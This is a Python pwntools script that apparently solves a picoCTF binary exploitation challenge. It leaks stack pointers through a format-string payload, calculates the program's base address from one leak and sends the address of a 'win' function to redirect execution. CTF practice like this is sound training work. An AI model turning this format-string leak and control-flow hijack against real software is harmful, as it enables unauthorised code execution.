45 lines
1.0 KiB
Python
Executable File
45 lines
1.0 KiB
Python
Executable File
#!/usr/bin/env nix-shell
|
|
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
|
|
|
|
from pwn import *
|
|
|
|
exe = ELF("./vuln")
|
|
|
|
context.binary = exe
|
|
|
|
ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split()
|
|
|
|
def conn() -> remote:
|
|
if args.REMOTE:
|
|
r = remote(ADDR, PORT)
|
|
else:
|
|
r = process([exe.path])
|
|
|
|
return r
|
|
|
|
def main():
|
|
r = conn()
|
|
|
|
# gdb.attach(r, gdbscript='''
|
|
# info proc mappings
|
|
# c
|
|
# ''')
|
|
|
|
# Calculated by inspecting the output - the reported binary start address from gdb
|
|
leak_offset = 0x1441
|
|
|
|
r.recvuntil(b'Enter your name:').decode()
|
|
r.sendline(b'%p\t'*20)
|
|
leaks = r.recvline().strip().decode().split('\t')
|
|
base_leak = leaks[18]
|
|
exe.address = int(base_leak[2:], 16) - leak_offset
|
|
print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}")
|
|
|
|
print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode())
|
|
r.sendline(hex(exe.symbols['win']))
|
|
print(r.recvall().decode())
|
|
r.close()
|
|
|
|
if __name__ == "__main__":
|
|
main()
|